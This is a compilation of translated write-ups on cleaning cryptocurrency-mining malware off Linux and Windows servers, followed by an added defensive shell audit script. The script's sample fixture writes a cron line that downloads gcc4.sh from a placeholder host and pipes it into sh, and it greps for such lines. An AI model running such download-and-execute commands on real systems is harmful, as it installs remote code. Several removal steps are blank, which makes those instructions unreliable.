Linux: cleaning up a mining virus
A new customer recently consulted Sine Security, saying that his server often lagged, the website failed to open, and remote connections to the server were extremely slow. Sometimes the ping value reached 300-500, and the connection often dropped. After listening to the customer's description, we would normally judge that he had been hit by a mixed CC + DDoS traffic attack. Strangely, though, the data center saw no traffic attack at all. It was not a traffic attack, yet it still caused the server to lag and the website to fail to open. What kind of attack is this? To solve the lag on the client's server, we immediately arranged for a security engineer to carry out security detection and deployment on his Linux server.
The mining Trojan is also designed so that if the customer forcibly stops the mining process, it automatically starts again and keeps mining without interruption. Careful inspection shows that it does this through an hourly scheduled task that remotely downloads the shell mining Trojan and executes it; the task checks whether the mining process currently exists and, if not, starts the Trojan to mine.
A detailed security inspection was carried out on the client's Linux server. Fortunately, no server data had been encrypted; the server was infected with a worm virus. If the data had been encrypted, the loss would have been great, because the client ran a platform and its data was very important. After finding the mining Trojan, the customer needed to know how the server had been attacked and how the Trojan had been uploaded, so that attacks could be prevented later on.
Through the security detection and analysis of our security engineers, we found that the server runs an Apache Tomcat environment, the platform's architecture is JSP + Oracle database, and the Apache Tomcat version dates from 2016, which has a serious remote command execution vulnerability. Through this vulnerability, an intruder can directly break into the server and obtain administrator permission on it. Sine Security engineers immediately repaired the Apache vulnerability and cleared the Trojan. So far the problem has been solved: the client's server runs stably and the website opens normally.
- Please do not visit strange websites. Browsing and downloading on strange websites may lead to infection.
- If there is a Trojan or virus program on the computer, install security software (such as Computer Housekeeper). Use the security software to scan the whole disk, find the virus and delete it. If it cannot be handled or there is an error, try to back up important information and then reinstall the system.
- If there are Trojans or virus programs on the mobile phone, install security software (such as Mobile Phone Housekeeper). Taking Mobile Phone Housekeeper as an example, open it, click "one-key checkup" on the main interface to automatically detect viruses on the phone, and then click "one-key removal".
You can download and install Tencent Royal Point. After opening it, you can directly scan for and kill this kind of computer virus using its virus scan and kill function.
The complete removal process for the mining virus is as follows; please carry it out with the network disconnected:
1. Stop and disable the Hyper access protection agent service
2.
3. Delete C:\Windows\system32\vmichapagentsrv.dll. If deletion fails, you can rename the file to another name
4. Restart the computer
5. Delete the directories C:\Windows\system32\Sysprep themes and C:\Windows\Sysprep themes
6. Delete C:\Windows\system32\secupdatehost.exe
7. See https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010
8.
This virus is a stubborn one; it needs to be removed in safe mode.
The choice of antivirus software is also very important: you have to choose a dedicated removal tool for this virus. You can use Computer Housekeeper to kill it.
/usr/sbin/kworker suspected to be a mining virus
Use clamscan for virus scanning
All the Trojans and backdoors are detected.
Then use clamscan -r --bell -i /usr/bin/kworker --remove to clean up the virus. Learn Linux together.
There is also a related netfs to clean up: clamscan -r --bell -i /usr/bin/netfs --remove cleans up that virus.
Next step: change the root password, restart, and find that the worker is no longer there.
First of all, we need to determine which machine's network card is sending out the packets. Fortunately, we have Zabbix monitoring. I checked one by one and found that the traffic of one machine was saturated; the problem should be on this machine.
I logged into the machine and checked the network card's traffic. My God, it was actually pushing this much traffic.
This machine mainly runs a Tomcat web service and an Oracle database. The problem should not be in the web service or the database. I checked the web log and found no exception. The database was normal and had no error log. The system log showed no exception either. I quickly checked the currently running processes to see whether there were any abnormal ones. As soon as I looked, I found several abnormal processes; if I hadn't looked carefully, I really couldn't have told that these processes were abnormal.
What kind of process is this? Every time I run ps -ef it is different; it changes all the time, and the process number keeps changing. I wanted to see which files the process had opened, but couldn't get a handle on it at the moment. Thinking about this, I suddenly realized that these should be child processes managed by a main process, so it was useless to look at the child processes: even if I killed them, new ones would be spawned. To catch the thief, go for the ringleader first. I used top -d1 to check the resource usage of the processes in real time, to see whether there were abnormal processes occupying CPU, memory and other resources. I found a strange process that I had never seen before; this should be the main process of the Trojan we were looking for.
I tried to kill this process with kill -9 ueksinzina, but after killing it, ps -ef still showed the child processes, didn't it? Looking at top -d1 again, I found that there was another main process. It seems it can't be killed; if it were so easy to kill, it wouldn't be a Trojan.
You can see that there is a scheduled task gcc4.sh in it, which was not set by us. Its content is even stranger. This should be what gets started after the listener dies. Here we delete all the related configuration, and delete /lib/libudev4.so.
This file is also found in the /etc/init.d/ directory; its contents are boot information, which we also deleted.
So far, no new Trojan process has been generated; in principle, the Trojan program has been terminated. The remaining work is to clear the files generated in these directories. After looking for them, I first cleared the Trojan startup script generated under the /etc/init.d directory, then cleared the link files under the /etc/rc#.d/ directory.
Later, I checked the modification times of the files in the /etc directory and found a newly generated file in the ssh directory; I don't know whether it was a problem. After that, we need to clean up the several files generated just now, clearing them directory by directory, for example "chattr -i /tmp" and then deleting the Trojan file, and so on; delete the Trojans under /bin and /usr/bin, and the Trojan cleanup is complete.
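The two Linux write-ups above point at the same persistence spots: the hourly scheduled task that re-downloads the shell miner (the Sine Security case), and the gcc4.sh task, /lib/libudev4.so, the /etc/init.d and /etc/rc#.d entries and the chattr -i step in the cleanup story. The POSIX shell script below is an added example, not code from any of the posts: it audits those spots, plus the on-disk "kworker" lookalike named in the clamscan post. It takes a path prefix ROOT so it can be run against a constructed sample tree (pass / on a live host); the sample tree, the placeholder.invalid host and the cron lines are constructed here, and only the names gcc4.sh, libudev4.so, netfs and kworker come from the posts.

```shell
#!/bin/sh
# Added example (not from the original posts): audit the persistence spots a
# Linux miner was found using: cron jobs that download and run a script,
# fresh /etc/init.d and /etc/rc*.d entries, /etc/ld.so.preload, immutable
# files, and binaries on disk named after kernel threads. ROOT is a prefix
# so the same functions run against a constructed sample tree.

# Cron lines that fetch a remote script and pipe it into a shell, or run
# something out of /tmp or /dev/shm. Output: file:line:content
suspicious_cron() {
    root="$1"
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/etc/cron.hourly/* \
             "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|/tmp/|/dev/shm/' "$f" \
            | sed "s|^|$f:|"
    done
}

# Init scripts and rc links changed within the last DAYS days (default 7);
# a freshly dropped miner leaves new entries here (gcc4.sh, netfs, ...).
recent_init_entries() {
    root="$1"; days="${2:-7}"
    find "$root"/etc/init.d "$root"/etc/rc*.d -mindepth 1 -maxdepth 1 \
         -mtime "-$days" 2>/dev/null | sort
}

# Libraries listed in /etc/ld.so.preload are injected into every dynamically
# linked process (how a libudev4.so-style hook hides a miner); on most hosts
# the file does not exist at all.
preload_entries() {
    root="$1"
    [ -f "$root"/etc/ld.so.preload ] || return 0
    grep -vE '^[[:space:]]*(#|$)' "$root"/etc/ld.so.preload
}

# Real kworker/kthreadd/ksoftirqd entries are kernel threads with no file on
# disk, so an executable by that name in a bin directory is a disguise.
kthread_lookalikes() {
    root="$1"
    find "$root"/bin "$root"/sbin "$root"/usr/bin "$root"/usr/sbin \
         "$root"/usr/local/bin -maxdepth 1 -type f \
         \( -name 'kworker*' -o -name 'kthreadd' -o -name 'ksoftirqd*' \
            -o -name 'kswapd*' \) 2>/dev/null | sort
}

# Files carrying the immutable attribute, which is what "chattr -i" clears
# before a Trojan file can be deleted. Needs lsattr (e2fsprogs); skipped if absent.
immutable_files() {
    command -v lsattr >/dev/null 2>&1 || return 0
    for d in "$@"; do
        [ -d "$d" ] || continue
        lsattr -R "$d" 2>/dev/null | awk '$1 ~ /i/ && $2 != "" {print $2}'
    done
}

# Constructed sample tree mirroring the findings above (not real indicators).
build_sample_tree() {
    root="$1"
    mkdir -p "$root"/etc/cron.hourly "$root"/etc/init.d "$root"/etc/rc3.d \
             "$root"/usr/sbin "$root"/usr/bin "$root"/lib
    # A benign hourly job next to a miner-style job that downloads and runs a script.
    printf '%s\n' '0 * * * * root /usr/sbin/logrotate /etc/logrotate.conf' \
        '15 * * * * root (curl -fsSL http://placeholder.invalid/gcc4.sh || wget -qO- http://placeholder.invalid/gcc4.sh) | sh' \
        > "$root"/etc/crontab
    # An old, legitimate init script versus a freshly dropped one with its rc link.
    printf '#!/bin/sh\n' > "$root"/etc/init.d/sshd
    touch -t 202001010000 "$root"/etc/init.d/sshd
    printf '#!/bin/sh\n/usr/sbin/kworker &\n' > "$root"/etc/init.d/netfs
    ln -s ../init.d/netfs "$root"/etc/rc3.d/S99netfs
    # Preload hook and a kernel-thread lookalike binary.
    printf '/lib/libudev4.so\n' > "$root"/etc/ld.so.preload
    : > "$root"/usr/sbin/kworker
}

# Stand-alone demo on the constructed tree; on a real host call the functions with /.
demo_root=$(mktemp -d)
build_sample_tree "$demo_root"
echo "== suspicious cron lines ==";      suspicious_cron "$demo_root"
echo "== recent init/rc entries ==";     recent_init_entries "$demo_root"
echo "== ld.so.preload entries ==";      preload_entries "$demo_root"
echo "== kernel-thread lookalikes ==";   kthread_lookalikes "$demo_root"
echo "== immutable files ==";            immutable_files "$demo_root"/usr/bin "$demo_root"/tmp
rm -rf "$demo_root"
```

Each finding is a lead, not a verdict: a legitimate package update also produces a fresh init script, so compare the flagged entries against the package manager's file list before deleting anything, and clear an immutable attribute only on files you have confirmed are not part of the system.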
Log in to the system, open Task Manager, and look at the processes that occupy a lot of memory and cannot be closed. Right-click the process and open the file location (first select "Show hidden files and operating system files" in the folder options). At this point you may see a systmss.exe process and a svchost.exe process imitating the operating system. Here you can also see a 2.bat file; right-click to edit and open this file to see which mining organization the malicious process communicates with.
By viewing the system operation log, we can analyze the source of the virus, its start time and other information. The general cause may be that port 3389 was not closed and a weak password allowed a remote login that brought in the virus.
Virus eradication: rename the virus executable systmss.exe to systmss.exe1 so that the virus cannot be executed. At this point you can stop the process from Task Manager. Open the Registry Editor and delete the entire key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\systems.
For Linux systems, please refer to the linked web page.